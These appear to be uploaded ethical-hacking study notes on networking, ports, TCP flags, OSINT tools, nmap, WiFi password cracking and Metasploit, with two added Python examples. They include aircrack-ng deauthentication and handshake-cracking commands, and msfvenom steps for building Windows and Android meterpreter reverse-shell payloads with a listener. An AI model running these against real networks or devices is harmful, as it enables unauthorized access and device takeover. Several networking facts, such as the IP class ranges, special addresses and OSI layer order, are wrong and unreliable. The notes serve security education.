
Ethical Hacking

The document provides an overview of networking concepts including types of networks (LAN, WAN, etc.), IP address formats (IPv4 and IPv6), and port information with examples of common ports. It also covers TCP flags, the OSI model, information gathering tools, network scanning techniques, enumeration, WiFi hacking methods, vulnerability assessment tools, and the Metasploit framework for exploitation. Additionally, it details the process of creating payloads for Windows and Android systems using Metasploit's msfvenom tool.

Uploaded by

ethicalishu

#Networking (1/Aug)...

It is defined as a connection between 2 or more devices which are used to share data.

Types: LAN, WLAN, CAN, MAN, WAN, PAN.

IP: It is a unique ID of our devices or host.

Type: IPv4 and IPv6

IPv4--
1981.
32 bit IP
4.3 million addresses
Numeric decimal notation (192.168.1.1)
Range 0-255.

IPv6--
1998
128 bit IP
7.3*10 raised to 28 IP addresses
Alphanumeric hexadecimal notation (2001:db8:3333:4444:5555:6666:7777:8888)
Range 0-9 and A-F.

Classes
A:0-126 (used by organisations)
B:128-191 (used by MNC)
C:191-223 (Most common IPs)
D:224-239 (Government registered IPs)
E:240-255 (used for Experiments)

Special IPs:
127.0.0.1 -- Loopback or localhost IP
169.0.0.1 -- APIPA (Automatic Pvt IP Addresses)
255.0.0.1 -- Broadcasting IPs

Private IPs:
A:10.0.0.1
B:178.16.1.1 To 178.32.1.1
C:192.168.1.1

----------------------------------------------------------------------------------

#Ports (2/Aug)

Total Ports: 65535 ports


Registered Ports: 1024

Port State:
Open
Closed
Filtered (Specific)

Basic Ports
20-21: FTP File Transfer Protocol
22: SSH Secure Shell (Requires authentication)
23: Telnet Teletype Network
25: SMTP Simple Mail Transfer Pro
53: DNS Domain Name System (Used to link Domain and Domain Name to IPs)
67,68: DHCP Dynamic Host Config Pro (Provides IPs to newly connected devices)
80: HTTP To host website (Plain Text)
110: POP3 Post Office Protocol
123: NTP N/W Transfer Pro
135-139: NetBIOS Name Service
143: IMAP4 Internet Msg Access Pro
161-162: SNMP Simple N/W Management Pro
389: LDAP Lightweight Dir Authentication Pro
443: HTTPS (Secured) {Uses SSL Secure Socket Layer and TLS Transport Layer Secure to encrypt DATA.}
445: Microsoft-DS (Active Directory) / SMB (System Management Block)
2049: NFS N/W File Sys
3389: RDP Remote Desktop Pro
5900: VNC Virtual N/W Controller
4444 & 8080: Dynamic Port

----------------------------------------------------------------------------------

#TCP

TCP Flags
SYN:Synchronise
ACK:Acknowledgement
FIN:Finish
RST:Reset
PSH:Push
URG:Urgent
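
How these flags sit in a TCP header, and how the reply to a SYN maps onto the three port states listed under #Ports. This is an added example, not part of the original notes; the sample segments and port numbers in it are constructed.

```python
import struct

# Bit masks of the six flags listed above, in byte 13 of the TCP header.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
             "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed 20-byte TCP header and name the flags that are set."""
    if len(segment) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    sport, dport, seq, ack, off_flags, window, _csum, _urg = struct.unpack(
        "!HHIIHHHH", segment[:20])
    return {
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "header_len": (off_flags >> 12) * 4,   # data offset counts 32-bit words
        "flags": {n for n, bit in TCP_FLAGS.items() if off_flags & bit},
    }

def port_state(reply):
    """Classify the reply to a SYN probe: open, closed or filtered."""
    if reply is None:               # nothing came back: the probe was dropped
        return "filtered"
    flags = parse_tcp_header(reply)["flags"]
    if {"SYN", "ACK"} <= flags:     # second step of the three-way handshake
        return "open"
    if "RST" in flags:              # host answered, but nothing listens there
        return "closed"
    return "unknown"

def build_segment(sport, dport, flags):
    """Constructed sample: a 20-byte header with the given flags set."""
    bits = sum(TCP_FLAGS[f] for f in flags)
    return struct.pack("!HHIIHHHH", sport, dport, 1000, 2001,
                       (5 << 12) | bits, 64240, 0, 0)

if __name__ == "__main__":
    replies = {22: build_segment(22, 40000, ["SYN", "ACK"]),
               23: build_segment(23, 40000, ["RST", "ACK"]),
               445: None}
    for port, reply in replies.items():
        print(port, port_state(reply))
```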

#OSI Open Sys InterConnection (7 layers)

1.Application
2.Presentation
3.Session
4.Transport
5.Network
6.Data Link
7.Physical

----------------------------------------------------------------------------------

#Info Gathering

**Websites**
1.Netcraft
2.Wayback Machine
3.DNS Dumpster
4.VirusTotal
5.WhoIs
6.Urlscan.io
7.Shodan (Info About Present Devices)

**Extensions**
1.Wappalyzer
2.FlagFox
3.W3Techs

**IP Info**
Grabify
IP2Location
Google Maps

OSINT Framework

----------------------------------------------------------------------------------

#N/W Scanning

Script Loc: /usr/share/nmap/scripts

Nmap Full N/W scan

nmap -Pn -sV -O IP

----------------------------------------------------------------------------------

#Enumeration

Def:
The process of extracting user names, machine names, N/W resources, shares and services from a sys.

----------------------------------------------------------------------------------

#WIFI Hacking

WAP: Wireless access pro

Tools:
aircrack-ng
aireplay-ng
airodump-ng

Types of password cracking


1.Prediction
2.Dictionary (Wordlist)
3.Hash Method

Wordlist:
cd /usr/share/wordlists/

#to unzip the .gz file -- use gunzip (Filename)

Commands:

$ifconfig

$airodump-ng wlan0

$airodump-ng -c1 --bssid (MAC Add) -w Ethas (Filename) wlan0 ------ Handshake

$aireplay-ng --deauth 05 -a (MAC Add) wlan0 ------- To Disconnect

$aircrack-ng Ethas-01.cap (Filename) ------ To check Handshake

$aircrack-ng -w rockyou.txt (Wordlist) Ethas-01.cap --- To check the password.

#Hashed Method: (USE JOHN2 tool)

$aircrack-ng .cap (cap file) -J newfilename

$hccap2john newfilename.hccap > New.txt
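
From the defending side, the burst of deauthentication frames sent in the "To Disconnect" step is visible to any monitor on the channel. The following added example (not part of the original notes) parses raw 802.11 management frames, assumed to carry no radiotap header, and flags such bursts; the MAC addresses, window and threshold are constructed assumptions.

```python
from collections import defaultdict

# Frame-control byte 0 for management frames: subtype 12 = deauth, 10 = disassoc.
DEAUTH, DISASSOC = 0xC0, 0xA0

def mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame: bytes):
    """Return kind, addresses and reason code for deauth/disassoc frames, else None."""
    if len(frame) < 26 or frame[0] not in (DEAUTH, DISASSOC):
        return None
    return {
        "kind": "deauth" if frame[0] == DEAUTH else "disassoc",
        "dest": mac(frame[4:10]),      # addr1: receiver
        "src": mac(frame[10:16]),      # addr2: claimed sender, unverified without 802.11w
        "bssid": mac(frame[16:22]),    # addr3
        "reason": int.from_bytes(frame[24:26], "little"),
    }

def deauth_bursts(capture, window=1.0, threshold=5):
    """Return BSSIDs with >= threshold deauth/disassoc frames inside `window` seconds."""
    recent = defaultdict(list)
    flagged = set()
    for ts, frame in capture:          # (timestamp, frame bytes), time-ordered
        info = parse_mgmt(frame)
        if info is None:
            continue
        times = [t for t in recent[info["bssid"]] if ts - t <= window] + [ts]
        recent[info["bssid"]] = times
        if len(times) >= threshold:
            flagged.add(info["bssid"])
    return sorted(flagged)

def build_frame(fc0, dest, src, bssid, reason=7):
    """Constructed sample frame: 24-byte header plus 2-byte reason code."""
    to_bytes = lambda m: bytes.fromhex(m.replace(":", ""))
    return (bytes([fc0, 0]) + b"\x00\x00" + to_bytes(dest) + to_bytes(src)
            + to_bytes(bssid) + b"\x00\x00" + reason.to_bytes(2, "little"))

AP, STA, OTHER = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02", "aa:bb:cc:00:00:03"
SAMPLE = [(0.1 * i, build_frame(DEAUTH, STA, AP, AP)) for i in range(6)]
SAMPLE.append((0.7, build_frame(0x80, "ff:ff:ff:ff:ff:ff", OTHER, OTHER)))  # beacon
SAMPLE.append((0.8, build_frame(DEAUTH, STA, OTHER, OTHER, reason=3)))      # single frame

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))
```

Enabling 802.11w (Protected Management Frames) on the access point lets clients discard forged deauthentication frames.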

----------------------------------------------------------------------------------
#Vulnerability Assessment

3 Terms:
CVE: Common vulnerability Exposure
CVSS: Common Vulnerability scoring system
CWE: Common Weakness Assessment

Tools Used:
Nessus Tenable (to find vulnerability and CVSS)

Websites :
CVE details
Rapid7
ExploitDB

----------------------------------------------------------------------------------
#Metasploit Framework

7 Modules of MF
1.Exploit :2315
2.Payloads :975
3.Auxiliary :1208
4.Post :412
5.Encoders :46
6.NOPs (NO Operation) :11
7.Evasion :9

Steps To use MF

$msfconsole (used to start MF)
$show (it is used to show exploits,payloads,aux,post,etc)
$search (to search CVSS)
$use (it is used to set up exploit)
$set (to set exploit,payload,etc)

Steps to check and set requirements

$options (to view req)
$set RHOSTS
$set LHOST

To use or run

$exploit (this cmd is used)
$info (info about exploit)

----------------------------------------------------------------------------------
#GAINING ACCESS & CREATING VENOM

1.Windows 10

Create venom at this location:- cd /var/www/html/

steps:
1.Create a VENOM
$msfvenom -p windows/meterpreter/reverse_tcp LHOST=(Local IP) LPORT=4444 -f exe -o Test.exe
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload windows/meterpreter/reverse_tcp

To check sessions
$sessions
$sessions -i (session no)

**************************************************
2.Android

Create a venom

steps:
1.Create a VENOM
$msfvenom -p android/meterpreter/reverse_tcp LHOST=(Local IP) LPORT=8080 -o Test.apk
2.set a listener (in metasploit)
$use exploit/multi/handler
3.start service/server
$service apache2 start
$service postgresql start
4.set payload
$ set payload android/meterpreter/reverse_tcp
